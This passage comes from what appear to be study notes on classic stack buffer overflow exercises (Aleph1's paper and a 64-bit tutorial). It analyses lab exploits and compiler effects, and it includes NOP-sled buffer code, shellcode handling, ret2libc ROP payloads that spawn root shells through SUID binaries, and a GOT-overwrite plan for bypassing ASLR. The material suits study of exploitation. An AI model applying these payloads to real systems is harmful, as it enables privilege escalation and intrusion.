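def build_exploit3_buffer(bsize, addr, shellcode=SHELLCODE):
    """NOP sled in the first half, then the shellcode, then the repeated address."""
    word = addr.to_bytes(4, "little")
    buf = bytearray(word * (bsize // 4))
    sled_len = bsize // 2
    buf[:sled_len] = bytes([NOP]) * sled_len
    buf[sled_len:sled_len + len(shellcode)] = shellcode
    return bytes(buf)


def lands_in_shellcode(buf, buffer_start, return_address, shellcode=SHELLCODE):
    """Follow execution from return_address: NOPs slide forward to the next byte."""
    pos = return_address - buffer_start
    if pos not in range(len(buf)):
        return False
    while pos in range(len(buf)) and buf[pos] == NOP:
        pos += 1
    return buf[pos:pos + len(shellcode)] == shellcode


if __name__ == "__main__":
    start = 0xFFFFD000  # hypothetical address of the buffer
    buf = build_exploit3_buffer(600, start + 100)
    print(lands_in_shellcode(buf, start, start + 100))  # address inside the sled
    print(lands_in_shellcode(buf, start, start + 400))  # address behind the shellcode
</code></pre></div>
<p>Any return address inside the sled reaches the shellcode, while an address in the part of the buffer that only holds the repeated stack address does not, which corresponds to the failure observed with <code>exploit3 600</code>.</p>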
<h3 id="exploit4">exploit4</h3>
<p><code>exploit4</code> works just like <code>exploit3</code> but instead of writing the NOP sled and the shellcode to the buffer, it writes them to an environment variable and only an address pointing to that variable into the buffer. This way, we’re not restricted by the buffer size concerning our NOP sled but we can make it as big as we want it to be.</p>
<p>In contrast to <code>exploit3</code>, <code>exploit4</code> can directly be called with e.g. <code>exploit4 600</code> for a buffer size of <code>600</code> bytes and no offset. Calling <code>vulnerable $RET</code> in the newly spawned shell, we achieve a buffer overflow and shellcode execution. Thus, putting a huge NOP sled into an environment variable certainly again increases the chance of hitting the shellcode when returning from the <code>main</code> function.</p>
<h3 id="eggshell">eggshell</h3>
<p>The <code>eggshell</code> executable basically does the same thing as <code>exploit4</code>. The difference is that it is suitable for different processor architectures and also has a more sophisticated command line interface. It also writes the overflow buffer to the environment variable <code>BOF</code> instead of <code>RET</code>.</p>
<p>However, the original version by Aleph1 contains an error: when creating the NOP sled, the stop condition is tested by <code>i &lt;= eggsize ...</code>. Therefore, the pointer into the egg buffer <code>ptr</code> is incremented once too often so that setting <code>egg[eggsize - 1] = '\0';</code> later in the code overwrites the last byte of the shellcode instead of just appending a zero byte to the NOP sled and shellcode. Thus, the shellcode tries to execute <code>/bin/s</code> instead of <code>/bin/sh</code>, which of course doesn’t yield the expected result.</p>
<p>Changing the comparison from <code>i &lt;= eggsize ...</code> to <code>i &lt; eggsize ...</code> fixes that problem, as one less NOP instruction is written to the egg buffer and thus the actual shellcode starts at a lower position in the buffer.</p>
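<p>The off-by-one error can be reproduced with a small Python model of the egg construction. This is a sketch, not Aleph1’s code: the function <code>build_egg</code> is hypothetical, the NOP size is assumed to be one byte as on x86, the shellcode is a placeholder that merely ends with the string <code>/bin/sh</code>, and the <code>EGG=</code> prefix is left out.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">NOP = 0x90
SHELLCODE = b"\xcc" * 8 + b"/bin/sh"  # placeholder opcodes followed by the string


def build_egg(eggsize, inclusive, shellcode=SHELLCODE):
    """Model the egg buffer; inclusive=True mimics the original less-or-equal test."""
    egg = bytearray(eggsize)
    limit = eggsize - len(shellcode) - 1          # loop bound with a NOP size of 1
    nop_count = limit + 1 if inclusive else limit
    pos = 0
    for _ in range(nop_count):                    # write the NOP sled
        egg[pos] = NOP
        pos += 1
    for byte in shellcode:                        # append the shellcode
        egg[pos] = byte
        pos += 1
    egg[eggsize - 1] = 0                          # terminating zero byte
    return bytes(egg)


if __name__ == "__main__":
    print(build_egg(64, inclusive=True)[-8:])     # original comparison
    print(build_egg(64, inclusive=False)[-8:])    # corrected comparison
</code></pre></div>
<p>With the inclusive comparison, the shellcode fills the buffer up to its last byte, so the terminating zero replaces the final <code>h</code>; with the strict comparison, the zero byte lands directly behind the intact string.</p>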
<p>Providing no offset as with <code>exploit4</code>, the address in <code>BOF</code> does not point to the <code>EGG</code> environment variable. Just like with <code>exploit3</code>, it is easy to find a fitting offset with a debugger by looking at the difference of the provided (incorrect) address and the address of the <code>EGG</code> variable (e.g. by issuing <code>search &quot;EGG&quot;</code> in <code>gdb</code> with the <code>pwndbg</code> plugin). Thus, calling e.g. <code>eggshell -b 600 -o -2000</code> lets us spawn a shell from the <code>vulnerable</code> executable.</p>
<p>Additionally, appending the <code>-s</code> flag to the <code>eggshell</code> call uses a different shellcode which not only spawns a shell but also calls <code>setreuid(geteuid(), geteuid())</code> before. With this addition, it is not only possible to spawn a shell at all, but also to spawn a shell with the executable’s owner’s privileges if the SUID bit on the executable is set. If the owner is set to <code>root</code> and the SUID bit is set (e.g. by executing <code>sudo chown root vulnerable &amp;&amp; sudo chmod u+s vulnerable</code>), it is thus possible to spawn a root shell even when executing the exploit as a non-privileged user.</p>
<h2 id="optimizing-compilation">Optimizing compilation</h2>
<p>The results described in the previous sections were achieved without any compiler optimizations enabled. If compiling with the highest optimizations in GCC (i.e. the <code>-O3</code> flag), the results are a little bit different.</p>
<h3 id="example2.c">example2.c</h3>
<p>If we look for example at <a href="./Smashing%20the%20stack%20-%20Aleph1/example2.c">example2.c</a>, we can immediately spot the vulnerability: In the function <code>function</code>, we copy the string the function receives into a 16-byte buffer, no matter how big the string is. Without optimizations, this leads to a segmentation fault, as the given string (i.e. 255 * ‘A’) is far too big for the buffer and overwrites the return address. With optimizations enabled, the function is completely inlined, i.e. the space for <code>buffer</code> is already allocated on the stack in the main function and instead of calling <code>function</code>, <code>main</code> just calls <code>strcpy</code> itself with the correct parameters, i.e. the addresses of <code>buffer</code> and <code>large_string</code>.<br />
Because of how the stack is organized in this case, we don’t get the segmentation fault we expected. The <code>buffer</code> array resides on the stack directly below the <code>large_string</code> array (i.e. at a lower address; see the explanatory figures below). The <code>strcpy</code> call therefore overwrites the start of <code>large_string</code> and coincidentally ends before it reaches the saved frame pointer or the return address, so no control flow information on the stack is harmed. Technically, this is still a buffer overflow, even though it does no harm in this particular case.</p>
<p>Stack without optimization (each row corresponds to 4 bytes):</p>
<pre><code>higher address |                             |
               +-----------------------------+  ---+
               | return address (main)       |     |
               +-----------------------------+     |
               | saved frame ptr (main)      |     |
               +-----------------------------+     |
               | i                           |     +--- stack frame of main
               +-----------------------------+     |
               | large_string[255 - 252]     |     |
               | large_string[251 - 248]     |     |
               |           ...               |     |
               | large_string[3 - 0]         |     |
               +-----------------------------+  ---+
               | return address (function)   |  ---+
               +-----------------------------+     |
               | saved frame ptr (function)  |     |
               +-----------------------------+     |
               | buffer[15 - 12]             |     +--- stack frame of function
               | buffer[11 - 8]              |     |
               | buffer[7 - 4]               |     |
               | buffer[3 - 0]               |     |
               +-----------------------------+  ---+
lower address  |                             |</code></pre>
<p>Stack with optimization (each row corresponds to 4 bytes):</p>
<pre><code>higher address |                             |
               +-----------------------------+  ---+
               | return address (main)       |     |
               +-----------------------------+     |
               | saved frame ptr (main)      |     |
               +-----------------------------+     |
               | large_string[255 - 252]     |     |
               | large_string[251 - 248]     |     |
               |           ...               |     +--- stack frame of main
               | large_string[3 - 0]         |     |
               +-----------------------------+     |
               | buffer[15 - 12]             |     |
               | buffer[11 - 8]              |     |
               | buffer[7 - 4]               |     |
               | buffer[3 - 0]               |     |
               +-----------------------------+  ---+
lower address  |                             |</code></pre>
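<p>The difference between the two layouts can be checked with a short sketch that walks over the regions from the figures and reports which of them a write starting at <code>buffer[0]</code> reaches. The region sizes are taken from the figures; the copy length of 256 bytes assumes that <code>strcpy</code> copies the 255 ‘A’ bytes plus one terminating zero byte, and the helper <code>touched_regions</code> is purely illustrative.</p>

```python
# Regions from the lowest address upwards as (name, size in bytes), per the figures
UNOPTIMIZED = [
    ("buffer", 16),
    ("saved frame ptr (function)", 4),
    ("return address (function)", 4),
    ("large_string", 256),
    ("i", 4),
    ("saved frame ptr (main)", 4),
    ("return address (main)", 4),
]
OPTIMIZED = [
    ("buffer", 16),
    ("large_string", 256),
    ("saved frame ptr (main)", 4),
    ("return address (main)", 4),
]


def touched_regions(layout, write_len):
    """Names of the regions hit by a write of write_len bytes starting at buffer[0]."""
    touched = []
    offset = 0  # distance of the current region from buffer[0]
    for name, size in layout:
        if write_len > offset:
            touched.append(name)
        offset += size
    return touched


# Assumption: 255 'A' bytes plus one terminating zero byte are copied
COPY_LEN = 256

print(touched_regions(UNOPTIMIZED, COPY_LEN))
print(touched_regions(OPTIMIZED, COPY_LEN))
```

<p>In the non-optimized layout the write passes over the saved frame pointer and the return address of <code>function</code>, whereas in the optimized layout it ends inside <code>large_string</code>.</p>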
<h3 id="example3.c-1">example3.c</h3>
<p>With <a href="./Smashing%20the%20stack%20-%20Aleph1/example3.c">example3.c</a>, the code also does not do what we expect, namely output <code>0</code> because we overwrote the return pointer of <code>function</code> in a way so that the <code>x = 1;</code> assignment is omitted. Here, the reason for this behavior is not inlining a function as we had previously but completely omitting a function.</p>
<p>When disassembling the corresponding executable, we can see that the function <code>function</code> is completely omitted from the compiler output. There are four reasons for this:</p>
<ol type="1">
<li>The function’s argument policy is “call-by-value” and not “call-by-reference”, i.e. the function just receives values from the caller but does not tamper with the caller’s memory by e.g. getting some pointers to manipulate.</li>
<li>The function has no return value (<code>void</code>) that would be saved in the caller’s function and reused.</li>
<li>The function does not access any global or otherwise somehow shared variables.</li>
<li>The function does not call any other functions which might influence the result / behavior (e.g. <code>printf</code>, <code>memset</code>, etc.).</li>
</ol>
<p>Because of those four reasons, the compiler’s analysis concludes that this function has no effect on the program’s result (although it does have one: it overwrites the return pointer). Thus, the compiler completely omits this function.</p>
<p>Therefore, the code is compiled in such a way that <code>main</code> simply prints <code>1</code> via <code>printf</code>, as the assignment <code>x = 1</code> is always executed.</p>
<h3 id="testsc.c-and-testsc2.c">testsc.c and testsc2.c</h3>
<p>The behavior of <a href="./Smashing%20the%20stack%20-%20Aleph1/testsc.c">testsc.c</a> and <a href="./Smashing%20the%20stack%20-%20Aleph1/testsc2.c">testsc2.c</a> is exactly the same when compiled with optimizations and is similar to the behavior of <code>example3</code> as described above.</p>
<p>GCC determines that the assignments (address of return address to <code>ret</code>, shellcode address to <code>*ret</code>) do not influence the further program flow (although they do: they overwrite the return pointer). Thus, from the compiler’s point of view, they can be omitted. Because of this behavior, the compiler output for the corresponding optimized main functions is</p>
<div class="sourceCode" id="cb6"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb6-1" data-line-number="1">endbr32</a>
<a class="sourceLine" id="cb6-2" data-line-number="2"><span class="bu">ret</span></a></code></pre></div>
<p>instead of</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb7-1" data-line-number="1">endbr32</a>
<a class="sourceLine" id="cb7-2" data-line-number="2"><span class="bu">push</span>   %<span class="kw">ebp</span></a>
<a class="sourceLine" id="cb7-3" data-line-number="3"><span class="bu">mov</span>    %<span class="kw">esp</span>,%<span class="kw">ebp</span></a>
<a class="sourceLine" id="cb7-4" data-line-number="4"><span class="bu">sub</span>    <span class="dv">$</span><span class="bn">0x4,</span>%<span class="kw">esp</span></a>
<a class="sourceLine" id="cb7-5" data-line-number="5"><span class="bu">call</span>   11a9 &lt;__x86.get_pc_thunk.<span class="kw">dx</span>&gt;</a>
<a class="sourceLine" id="cb7-6" data-line-number="6"><span class="bu">add</span>    <span class="dv">$</span><span class="bn">0x2e20,</span>%<span class="kw">edx</span></a>
<a class="sourceLine" id="cb7-7" data-line-number="7"><span class="bu">lea</span>    <span class="bn">-0x4</span>(%<span class="kw">ebp</span>),%<span class="kw">eax</span>     # <span class="bu">load</span> address of <span class="bu">ret</span></a>
<a class="sourceLine" id="cb7-8" data-line-number="8"><span class="bu">add</span>    <span class="dv">$</span><span class="bn">0x8,</span>%<span class="kw">eax</span>           # increment address by <span class="dv">8</span> bytes = <span class="dv">2</span> words (<span class="dv">32</span> bits each)</a>
<a class="sourceLine" id="cb7-9" data-line-number="9"><span class="bu">mov</span>    %<span class="kw">eax</span>,-<span class="bn">0x4</span>(%<span class="kw">ebp</span>)     # save new address of <span class="bu">ret</span> to <span class="bu">ret</span></a>
<a class="sourceLine" id="cb7-10" data-line-number="10"><span class="bu">mov</span>    <span class="bn">-0x4</span>(%<span class="kw">ebp</span>),%<span class="kw">eax</span>     # <span class="bu">load</span> <span class="bu">ret</span></a>
<a class="sourceLine" id="cb7-11" data-line-number="11"><span class="bu">lea</span>    <span class="bn">0x44</span>(%<span class="kw">edx</span>),%<span class="kw">edx</span>     # <span class="bu">load</span> address of shellcode</a>
<a class="sourceLine" id="cb7-12" data-line-number="12"><span class="bu">mov</span>    %<span class="kw">edx</span>,(%<span class="kw">eax</span>)         # save address of shellcode to <span class="bu">ret</span></a>
<a class="sourceLine" id="cb7-13" data-line-number="13"><span class="bu">nop</span></a>
<a class="sourceLine" id="cb7-14" data-line-number="14"><span class="bu">leave</span></a>
<a class="sourceLine" id="cb7-15" data-line-number="15"><span class="bu">ret</span></a></code></pre></div>
<p>(comments added for better readability).</p>
<p>The optimized <code>main</code> thus does only one thing: immediately return without any action.</p>
<p>Changing the main function from</p>
<div class="sourceCode" id="cb8"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb8-1" data-line-number="1"><span class="dt">void</span> main() {</a>
<a class="sourceLine" id="cb8-2" data-line-number="2">    <span class="dt">int</span> *ret;</a>
<a class="sourceLine" id="cb8-3" data-line-number="3">    ret = (<span class="dt">int</span> *)&amp;ret + <span class="dv">2</span>;</a>
<a class="sourceLine" id="cb8-4" data-line-number="4">    (*ret) = (<span class="dt">int</span>)shellcode;</a>
<a class="sourceLine" id="cb8-5" data-line-number="5">}</a></code></pre></div>
<p>to</p>
<div class="sourceCode" id="cb9"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb9-1" data-line-number="1"><span class="dt">void</span> main() {</a>
<a class="sourceLine" id="cb9-2" data-line-number="2">    <span class="dt">int</span> *ret;</a>
<a class="sourceLine" id="cb9-3" data-line-number="3">    ret = (<span class="dt">int</span> *)&amp;ret + <span class="dv">2</span>;</a>
<a class="sourceLine" id="cb9-4" data-line-number="4">    (*ret) = (<span class="dt">int</span>)shellcode;</a>
<a class="sourceLine" id="cb9-5" data-line-number="5">    printf(<span class="st">&quot;ret: %p</span><span class="sc">\n</span><span class="st">&quot;</span>, ret);</a>
<a class="sourceLine" id="cb9-6" data-line-number="6">}</a></code></pre></div>
<p>forces the compiler to include the calculations and assignments concerning <code>ret</code> in the compiler output, as <code>ret</code> is explicitly referenced in an output to the console.</p>
<h3 id="exploits">Exploits</h3>
<p>Concerning the exploits (<code>overflow1</code>, <code>exploit2</code>, <code>exploit3</code>, <code>exploit4</code>, <code>eggshell</code>), there is not a huge difference whether the code is optimized or not.</p>
<p>One change that is necessary is to explicitly return the stack pointer address from the <code>get_sp</code> functions instead of just copying it to the <code>eax</code> register and assuming that this register is used for the return value. Because of the optimizations, GCC may inline the <code>get_sp</code> function and not realize that the value in <code>eax</code> is important and just discard it. Thus, a change from</p>
<div class="sourceCode" id="cb10"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb10-1" data-line-number="1"><span class="dt">unsigned</span> <span class="dt">long</span> get_sp(<span class="dt">void</span>) {</a>
<a class="sourceLine" id="cb10-2" data-line-number="2">    asm(<span class="st">&quot;movl %esp,%eax&quot;</span>);</a>
<a class="sourceLine" id="cb10-3" data-line-number="3">}</a></code></pre></div>
<p>to</p>
<div class="sourceCode" id="cb11"><pre class="sourceCode c"><code class="sourceCode c"><a class="sourceLine" id="cb11-1" data-line-number="1"><span class="dt">unsigned</span> <span class="dt">long</span> get_sp(<span class="dt">void</span>) {</a>
<a class="sourceLine" id="cb11-2" data-line-number="2">    <span class="dt">unsigned</span> <span class="dt">long</span> result;</a>
<a class="sourceLine" id="cb11-3" data-line-number="3">    asm(<span class="st">&quot;movl %%esp,%0&quot;</span></a>
<a class="sourceLine" id="cb11-4" data-line-number="4">        : <span class="st">&quot;=g&quot;</span>(result));</a>
<a class="sourceLine" id="cb11-5" data-line-number="5">    <span class="cf">return</span> result;</a>
<a class="sourceLine" id="cb11-6" data-line-number="6">}</a></code></pre></div>
<p>solves the problem by switching from <code>basic asm</code> notation to <code>extended asm</code> notation (see <a href="https://gcc.gnu.org/onlinedocs/gcc/Using-Assembly-Language-with-C.html">GCC documentation</a>), as the stack pointer address is now explicitly saved to a variable and returned. Both versions yield exactly the same compiler output for <code>get_sp</code> (if compiled with optimizations), but the latter one forces GCC to really use the returned value in <code>eax</code> and not discard it.</p>
<p>With this change made, the non-optimized exploits still work as described in the above sections. For the optimized exploits, it is sufficient to change the offsets for <code>exploit2</code> (<code>1676</code> instead of <code>1660</code>) and <code>exploit3</code> (<code>1600</code> instead of <code>350</code>); the other exploits (namely: <code>overflow1</code>, <code>exploit4</code>, <code>eggshell</code>) still work as expected.</p>
<h1 id="bit-linux-stack-smashing">64-bit Linux stack smashing</h1>
<p>This tutorial found on <a href="https://blog.techorganic.com" class="uri">https://blog.techorganic.com</a> is about exploiting stack buffer overflows on 64 bit machines and consists of three parts.</p>
<h2 id="part-1">Part 1</h2>
<p>In the <a href="https://blog.techorganic.com/2015/04/10/64-bit-linux-stack-smashing-tutorial-part-1/">first part</a>, a classical stack buffer overflow is conducted with all the protection mechanisms turned off (NX bit, canaries, ASLR). The attack is conducted by writing the shellcode to an environment variable, calculating the address of the environment variable on the stack and overwriting the return address of the function <code>vuln()</code> from <a href="./64bit%20Stack%20smashing%20-%20superkojiman/vulnerable.c">vulnerable.c</a>.</p>
<p>This is a pretty simple exploit; it does not even use tricks like NOP sleds in front of the shellcode. The whole exploit can be conducted by executing the <a href="./64bit%20Stack%20smashing%20-%20superkojiman/pwn_vulnerable.sh">pwn_vulnerable.sh</a> shell script which does all the calculation and formatting.</p>
<h2 id="part-2">Part 2</h2>
<p>In the <a href="https://blog.techorganic.com/2015/04/21/64-bit-linux-stack-smashing-tutorial-part-2/">second part</a>, the stack is not used for executing shellcode (i.e. by placing the shellcode directly on the stack via the input or by placing it on the stack via environment variables). Instead, a <code>ret2libc</code> attack is conducted.<br />
In this attack, the return address is overwritten such that the program jumps to libc and executes arbitrary code from there. As libc is included as a shared library, the code in there has to be executable. This way, we can work around the restriction that the NX bit might be set on the stack and our shellcode from the stack might not be executable.</p>
<p>The necessary steps are the following:</p>
<ol type="1">
<li>Find the address of the <code>system</code> function in libc via <code>gdb</code> (note: ASLR is still disabled, the address thus doesn’t change between executions)</li>
<li>Find a pointer to the string “/bin/sh” (easy, already included in the executable (see <a href="./64bit%20Stack%20smashing%20-%20superkojiman/vulnerable.c#L14">vulnerable.c</a>))</li>
<li>Find a gadget to load the pointer to this string into the register <code>rdi</code> before calling <code>system</code> (can be found in <code>__libc_csu_init</code>)</li>
<li>Combine the addresses and run it</li>
</ol>
<p>The code is then the following (<code>cat</code> is necessary for keeping the shell open):</p>
<div class="sourceCode" id="cb12"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb12-1" data-line-number="1"><span class="kw">(</span><span class="ex">python3</span> -c <span class="st">&quot;from struct import pack; import sys; sys.stdout.buffer.write(</span></a>
<a class="sourceLine" id="cb12-2" data-line-number="2"><span class="st">    b'A' * 104 +                        # Padding to reach the return address</span></a>
<a class="sourceLine" id="cb12-3" data-line-number="3"><span class="st">    pack('&lt;Q', 0x0000555555555273) +    # Address of pop rdi; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb12-4" data-line-number="4"><span class="st">    pack('&lt;Q', 0x000055555555603f) +    # Address of &quot;</span>/bin/sh<span class="st">&quot; in function main</span></a>
<a class="sourceLine" id="cb12-5" data-line-number="5"><span class="st">    pack('&lt;Q', 0x00007ffff7e18410)      # Address of function system</span></a>
<a class="sourceLine" id="cb12-6" data-line-number="6"><span class="st">    )&quot;</span><span class="kw">;</span> <span class="fu">cat</span><span class="kw">)</span> <span class="kw">|</span> <span class="ex">./vulnerable</span></a></code></pre></div>
<p>Unfortunately, this only yields a segmentation fault. Debugging shows that the segfault occurs during the <code>movaps xmmword ptr [rsp + 0x50], xmm0</code> instruction in <code>do_system</code>. The segfault occurs because the stack pointer (here referenced via <code>rsp</code>) is not properly aligned. <code>movaps</code> requires the memory address to be aligned to 16 bytes (see <a href="https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-instruction-set-reference-manual-325383.pdf#page=701">Intel instruction set reference</a>). When the segfault occurs, the <code>rsp</code> register contains the value <code>0x7fffffffdeb8</code>, which is not aligned to 16 bytes (the last hex digit would have to be <code>0</code>). By extending the data we copy onto the stack by 8 bytes, we can achieve proper alignment.<br />
As 64 bit addresses are exactly 8 bytes, the easiest way to achieve that is by adding an address to the stack that doesn’t change our execution. This could be the address of a <code>ret</code> instruction before our <code>pop rdi; ret</code> gadget. Such an instruction has no effect: when we return to this instruction, it immediately returns to the next instruction which is our exploit code.</p>
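<p>The alignment argument can be verified with a few lines of arithmetic. The sketch below uses the <code>rsp</code> value from the text; that one additional 8-byte chain entry shifts <code>rsp</code> by exactly 8 bytes at the time of the <code>movaps</code> is an assumption made for illustration, and the helper name <code>misalignment</code> is hypothetical.</p>

```python
ALIGNMENT = 16  # movaps needs a 16-byte aligned memory operand


def misalignment(address):
    """Number of bytes by which address lies above the previous 16-byte boundary."""
    return address % ALIGNMENT


rsp_at_fault = 0x7FFFFFFFDEB8   # value observed when the segfault occurs
rsp_shifted = rsp_at_fault + 8  # assumption: one extra 8-byte entry shifts rsp by 8

# The operand is rsp + 0x50; 0x50 is a multiple of 16, so only rsp itself matters
print(misalignment(rsp_at_fault + 0x50))
print(misalignment(rsp_shifted + 0x50))
```

<p>A remainder of 8 means the operand sits exactly half-way between two 16-byte boundaries, which is why a single extra 8-byte address is enough to fix it.</p>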
<p>Thus, a fixed version of the code is as follows:</p>
<div class="sourceCode" id="cb13"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb13-1" data-line-number="1"><span class="kw">(</span><span class="ex">python3</span> -c <span class="st">&quot;from struct import pack; import sys; sys.stdout.buffer.write(</span></a>
<a class="sourceLine" id="cb13-2" data-line-number="2"><span class="st">    b'A' * 104 +                        # Padding to reach the return address</span></a>
<a class="sourceLine" id="cb13-3" data-line-number="3"><span class="st">    pack('&lt;Q', 0x00005555555551da) +    # Address of ret in function vuln</span></a>
<a class="sourceLine" id="cb13-4" data-line-number="4"><span class="st">    pack('&lt;Q', 0x0000555555555273) +    # Address of pop rdi; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb13-5" data-line-number="5"><span class="st">    pack('&lt;Q', 0x000055555555603f) +    # Address of &quot;</span>/bin/sh<span class="st">&quot; in function main</span></a>
<a class="sourceLine" id="cb13-6" data-line-number="6"><span class="st">    pack('&lt;Q', 0x00007ffff7e18410)      # Address of function system</span></a>
<a class="sourceLine" id="cb13-7" data-line-number="7"><span class="st">    )&quot;</span><span class="kw">;</span> <span class="fu">cat</span><span class="kw">)</span> <span class="kw">|</span> <span class="ex">./vulnerable</span></a></code></pre></div>
<p>If the SUID bit is set on the executable and it is owned by root, we can spawn a root shell with the following code:</p>
<div class="sourceCode" id="cb14"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb14-1" data-line-number="1"><span class="kw">(</span><span class="ex">python3</span> -c <span class="st">&quot;from struct import pack; import sys; sys.stdout.buffer.write(</span></a>
<a class="sourceLine" id="cb14-2" data-line-number="2"><span class="st">    b'A' * 104 +                        # Padding to reach the return address</span></a>
<a class="sourceLine" id="cb14-3" data-line-number="3"><span class="st">    pack('&lt;Q', 0x00005555555551da) +    # Address of ret in function vuln</span></a>
<a class="sourceLine" id="cb14-4" data-line-number="4"><span class="st">    pack('&lt;Q', 0x0000555555555273) +    # Address of pop rdi; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb14-5" data-line-number="5"><span class="st">    pack('&lt;Q', 0x0000000000000000) +    # Value 0 =&gt; uid of root</span></a>
<a class="sourceLine" id="cb14-6" data-line-number="6"><span class="st">    pack('&lt;Q', 0x0000555555555271) +    # Address of pop rsi; pop r15; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb14-7" data-line-number="7"><span class="st">    pack('&lt;Q', 0x0000000000000000) +    # Value 0 =&gt; uid of root (into rsi)</span></a>
<a class="sourceLine" id="cb14-8" data-line-number="8"><span class="st">    pack('&lt;Q', 0x4141411411414141) +    # Junk (into r15)</span></a>
<a class="sourceLine" id="cb14-9" data-line-number="9"><span class="st">    pack('&lt;Q', 0x00007ffff7eda920) +    # Address of function setreuid</span></a>
<a class="sourceLine" id="cb14-10" data-line-number="10"><span class="st">    pack('&lt;Q', 0x0000555555555273) +    # Address of pop rdi; ret in function __libc_csu_init</span></a>
<a class="sourceLine" id="cb14-11" data-line-number="11"><span class="st">    pack('&lt;Q', 0x000055555555603f) +    # Address of &quot;</span>/bin/sh<span class="st">&quot; in function main</span></a>
<a class="sourceLine" id="cb14-12" data-line-number="12"><span class="st">    pack('&lt;Q', 0x00007ffff7e18410)      # Address of function system</span></a>
<a class="sourceLine" id="cb14-13" data-line-number="13"><span class="st">    )&quot;</span><span class="kw">;</span> <span class="fu">cat</span><span class="kw">)</span> <span class="kw">|</span> <span class="ex">./vulnerable</span></a></code></pre></div>
<p>This code additionally calls <code>setreuid(0, 0)</code> before spawning the shell.</p>
<p>Note: when working through this exercise, I could not just get the addresses from the executable but had to get the addresses from GDB. This is because the executable by default is compiled as PIE (Position Independent Executable). The addresses in the executable (e.g. shown by <code>objdump -d vulnerable</code>) are only offsets from the base address. The base address (<code>0x0000555555554000</code>) is always the same, because ASLR is disabled. Knowing this base address, one could calculate all other addresses in the executable by adding the given offset to the base address.<br />
If compiled with the compiler flag <code>-fno-pic</code> and the linker flag <code>-no-pie</code>, the executable would contain the absolute addresses of the instructions instead of offsets relative to the base address. This would probably make it easier to find the addresses (in the code snippet above: addresses for the <code>ret</code> instruction, <code>pop rdi; ret</code> and <code>/bin/sh</code>) because it would be sufficient to just look at the executable without loading it into a debugger. However, it would probably still be necessary to get the address of the <code>system</code> function by loading the executable into a debugger, as libc is only loaded dynamically at runtime. Its address can thus only be determined either by knowing the offset of <code>system</code> in libc and the base address at which libc will be loaded, or by loading the executable into GDB and printing the address with <code>p system</code>.</p>
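<p>The base-plus-offset calculation described in the note looks roughly as follows. The offsets in this sketch were derived by subtracting the base address from the absolute addresses used in the payloads above; they were not read from <code>objdump</code> output, so treat them as illustrative.</p>

```python
PIE_BASE = 0x0000555555554000  # load base with ASLR disabled, as stated in the note

# Offsets derived from the absolute addresses in the payloads above (illustrative)
OFFSETS = {
    "ret": 0x11DA,
    "pop rdi; ret": 0x1273,
    "/bin/sh": 0x203F,
}


def absolute(offset, base=PIE_BASE):
    """Runtime address of a location given its offset inside the PIE executable."""
    return base + offset


for name, offset in OFFSETS.items():
    print(name, hex(absolute(offset)))
```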
<h2 id="part-3">Part 3</h2>
<p>For the <a href="https://blog.techorganic.com/2016/03/18/64-bit-linux-stack-smashing-tutorial-part-3/">third part</a> of the 64 bit stack smashing tutorial, ASLR is enabled (e.g. by the command <code>echo 2 | sudo tee /proc/sys/kernel/randomize_va_space</code>). Additionally, the Yama security module, as configured by default on many distributions, restricts <code>ptrace</code> functionality for security reasons. With this restriction, a debugger cannot attach to an already running process that is not its own child. Thus, it is necessary to lift the restriction by issuing the command <code>echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope</code> for debugging.</p>
<p>The exploit is based on the executable being available over the network (<code>socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./vulnerable_advanced</code>) because we can then easily issue the distinct stages of the exploit. The exploit then consists of the following steps:</p>
<ol type="1">
<li>Leak <code>memset</code> address from the Global Offset Table (GOT)</li>
<li>Calculate the libc base address by the <code>memset</code> address and the known (fixed) offset of <code>memset</code> in libc</li>
<li>Calculate the address of <code>system</code> by the libc base address and the known (fixed) offset of <code>system</code> in libc</li>
<li>Overwrite the GOT entry of <code>memset</code> with the address of <code>system</code> =&gt; any further <code>memset</code> calls call <code>system</code> instead</li>
<li>Read the “/bin/sh” string into memory (as an argument to <code>system</code>)</li>
<li>Call <code>memset</code> again which in fact calls <code>system</code></li>
</ol>
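<p>Steps 1 to 4 boil down to simple address arithmetic, sketched below. All concrete numbers (<code>leaked_bytes</code>, <code>MEMSET_OFFSET</code>, <code>SYSTEM_OFFSET</code>) are hypothetical placeholders; real values depend on the libc build and change with every run once ASLR is enabled.</p>

```python
def libc_base(leaked_memset, memset_offset):
    """Step 2: libc base address from a leaked memset address and its known offset."""
    return leaked_memset - memset_offset


def system_address(base, system_offset):
    """Step 3: address of system from the libc base address and its known offset."""
    return base + system_offset


# Hypothetical placeholders, not values from a real libc
leaked_bytes = bytes.fromhex("a0b5f1f7ff7f0000")  # step 1: 8 bytes read from the GOT
MEMSET_OFFSET = 0x18B5A0
SYSTEM_OFFSET = 0x055410

leaked_memset = int.from_bytes(leaked_bytes, "little")  # x86_64 is little endian
base = libc_base(leaked_memset, MEMSET_OFFSET)
system = system_address(base, SYSTEM_OFFSET)

# Step 4: these 8 bytes would be written over the GOT entry of memset
got_overwrite = system.to_bytes(8, "little")

print(hex(base), hex(system), got_overwrite.hex())
```

<p>A quick sanity check for a computed base address is that it is page aligned, i.e. its lowest three hex digits are zero. If they are not, the offset used for <code>memset</code> most likely does not belong to the function the GOT entry actually points to.</p>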
<p>The following difficulties occurred during those steps and the development of that exploit:</p>
<ol type="1">
